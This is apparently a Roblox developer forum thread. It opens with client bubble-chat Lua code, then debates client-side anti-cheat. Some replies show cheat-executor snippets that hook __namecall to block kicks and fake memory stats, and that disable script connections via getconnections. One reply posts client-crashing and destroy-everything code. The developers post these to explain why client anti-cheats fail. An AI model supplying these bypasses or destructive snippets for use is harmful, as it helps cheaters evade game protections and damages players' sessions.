	elseif color == Enum.ChatColor.Red then bubbleColor = BubbleColor.RED end

	local safeMessage = this:SanitizeChatLine(message)
	local line = createGameChatLine(origin, safeMessage, not fromOthers, bubbleColor)

	this.CharacterSortedMsg:Get(line.Origin).Fifo:PushBack(line)
	if UserShouldLocalizeGameChatBubble then
		this:CreateChatLineRender(origin, line, false, this.CharacterSortedMsg:Get(line.Origin).Fifo, true)
	else
		this:CreateChatLineRender(origin, line, false, this.CharacterSortedMsg:Get(line.Origin).Fifo, false)
	end
end

function this:BubbleChatEnabled()
	if UserRoactBubbleChatBeta or (UserPreventOldBubbleChatOverlap and ChatService.BubbleChatEnabled) then
		return false
	end
	local clientChatModules = ChatService:FindFirstChild("ClientChatModules")
	if clientChatModules then
		local chatSettings = clientChatModules:FindFirstChild("ChatSettings")
		if chatSettings then
			chatSettings = require(chatSettings)
			if chatSettings.BubbleChatEnabled ~= nil then
				return chatSettings.BubbleChatEnabled
			end
		end
	end
	return PlayersService.BubbleChat
end

function this:ShowOwnFilteredMessage()
	local clientChatModules = ChatService:FindFirstChild("ClientChatModules")
	if clientChatModules then
		local chatSettings = clientChatModules:FindFirstChild("ChatSettings")
		if chatSettings then
			chatSettings = require(chatSettings)
			return chatSettings.ShowUserOwnFilteredMessage
		end
	end
	return false
end

function findPlayer(playerName)
	for i,v in pairs(PlayersService:GetPlayers()) do
		if v.Name == playerName then
			return v
		end
	end
end

ChatService.Chatted:connect(function(origin, message, color) this:OnGameChatMessage(origin, message, color) end)

local cameraChangedCon = nil
if game.Workspace.CurrentCamera then
	cameraChangedCon = game.Workspace.CurrentCamera:GetPropertyChangedSignal("CFrame"):connect(function(prop) this:CameraCFrameChanged() end)
end

game.Workspace.Changed:connect(function(prop)
	if prop == "CurrentCamera" then
		if cameraChangedCon then cameraChangedCon:disconnect() end
		if game.Workspace.CurrentCamera then
			cameraChangedCon = game.Workspace.CurrentCamera:GetPropertyChangedSignal("CFrame"):connect(function(prop) this:CameraCFrameChanged() end)
		end
	end
end)


local AllowedMessageTypes = nil

function getAllowedMessageTypes()
	if AllowedMessageTypes then
		return AllowedMessageTypes
	end
	local clientChatModules = ChatService:FindFirstChild("ClientChatModules")
	if clientChatModules then
		local chatSettings = clientChatModules:FindFirstChild("ChatSettings")
		if chatSettings then
			chatSettings = require(chatSettings)
			if chatSettings.BubbleChatMessageTypes then
				AllowedMessageTypes = chatSettings.BubbleChatMessageTypes
				return AllowedMessageTypes
			end
		end
		local chatConstants = clientChatModules:FindFirstChild("ChatConstants")
		if chatConstants then
			chatConstants = require(chatConstants)
			AllowedMessageTypes = {chatConstants.MessageTypeDefault, chatConstants.MessageTypeWhisper}
		end
		return AllowedMessageTypes
	end
	return {"Message", "Whisper"}
end

function checkAllowedMessageType(messageData)
	local allowedMessageTypes = getAllowedMessageTypes()
	for i = 1, #allowedMessageTypes do
		if allowedMessageTypes[i] == messageData.MessageType then
			return true
		end
	end
	return false
end

local ChatEvents = ReplicatedStorage:WaitForChild("DefaultChatSystemChatEvents")
local OnMessageDoneFiltering = ChatEvents:WaitForChild("OnMessageDoneFiltering")
local OnNewMessage = ChatEvents:WaitForChild("OnNewMessage")

OnNewMessage.OnClientEvent:connect(function(messageData, channelName)
	if not checkAllowedMessageType(messageData) then
		return
	end

	local sender = findPlayer(messageData.FromSpeaker)
	if not sender then
		return
	end

	if not messageData.IsFiltered or messageData.FromSpeaker == LocalPlayer.Name then
		if messageData.FromSpeaker ~= LocalPlayer.Name or this:ShowOwnFilteredMessage() then
			return
		end
	end

	this:OnPlayerChatMessage(sender, messageData.Message, nil)
end)

OnMessageDoneFiltering.OnClientEvent:connect(function(messageData, channelName)
	if not checkAllowedMessageType(messageData) then
		return
	end

	local sender = findPlayer(messageData.FromSpeaker)
	if not sender then
		return
	end

	if messageData.FromSpeaker == LocalPlayer.Name and not this:ShowOwnFilteredMessage() then
		return
	end

	this:OnPlayerChatMessage(sender, messageData.Message, nil)
end)
3 Likes

Any size that you can fit into a string

read more about loadstring here

4 Likes

most exploits have debug.getmetatable which lets you hook metamethod __namecall and __index so this script would be useless for 2 reasons:
make Stats:GetTotalMemoryUsageMb() return a fake value by hooking __namecall
make Player:Kick() not do anything by hooking __namecall
basically never do anti cheat on the client. It will be easily bypassed

if you want to know how:

 local stats = game:GetService("Stats")
local old; old = hookmetamethod(game, "__namecall", function(self, ...)
      if self == game.Players.LocalPlayer and getnamecallmethod() == "Kick" then
           return --do not kick the player
     elseif self == stats and getnamecallmethod() == "GetTotalMemoryUsageMb" then
         return 342 --return a fake value
       else
         return old(self, ...)
      end
 end)
1 Like

Just kick player when he tries to remove it using :Destroying() Fires immediately before the instance is destroyed via Instance:Destroy()

also it wont stop exploiters from using some speed exploits

2 Likes

as I know Destroying is not implemented yet, .Changed or .AncestryChanged could be used. But still exploiters can easily disable events they have control over EVERYTHING in the client.

U cant kick yourself from local script? and I think :Destroying() is working fine also how they could discable remote event? still u can have 2 or more scripts that will check if sctipt is still there

1 Like

even if .Destroying fires it doesnt stop exploits from

for i,v in ipairs(getconnections(Yourscript.Destroying)) do
   v:Disable()
end

I know exploit functions bcuz I need to make my games more secure from exploiters

1 Like

Just a small typo. Great job with this post! This really helps me, especially with people exploiting my game in the past.

while true do end

workspace.ChildAdded:Connect(function()
  Instance.new("Part", workspace)
end)
Instance.new("Part", workspace)

table.foreach(game:GetDescendants(), pcall(function(i,v) 
  v:Destroy()
end))

Sure they can all be bypassed but it’s better than nothing

Kick them if script is discabled using other local script? (this dont stop them but will be very annoying to find it)

also looks like getconnections is exclusive for Synapse X and I dont think it work anymore (64 bit update)

nearly every exploit has it and why would the 64 bit update break it

I dont think there is any roblox executor that can run on 64bit roblox

most executors got fixed and bypassed byfron already

idk tho I see a lot of exploiters rn so I guess they got fixed

There is no way of bypasing byfron (from what people say) but there still are 32 bit roblox on other platforms like Mobile. Also microsoft store still have 32bit version of roblox

I’m 90% sure Hyperion has already been reverse engineered and bypsssed but the issue exploits are having is porting to 64 bit

Thank you for responding, but literally a few lines about that code snippet I declare that client sided anticheats are useless against people who know what they’re doing when exploiting. But this would be effective against novice exploiters/skids that have little to no clue on what they are doing.

And an exploiter could just disconnect this. As mentioned above.

Thank you, I didn’t expect this post to actually become this big but I’m glad it helped.

Client sided anticheats, even byfrons can be bypassed but not without great difficulty. You would have to understand how roblox operates down to the machine code to create an effective executor that is able to bypass byfron since its detections are so built in, which is why it only works on certain bit versions!

Also this post is indeed 2 years old, so most the methods probably aren’t as effective.

The whole point of this anti-cheat is to stop novice skids exploiting, then manually deal with the 10% of the other chunk that know what they’re doing.

I’d put a votekick in the game so the exploiters can be banned in a few minutes, without having to call a moderator.

I would put some limitations to it, like you have to be playing for half an hour, or your account having to be more than one month old.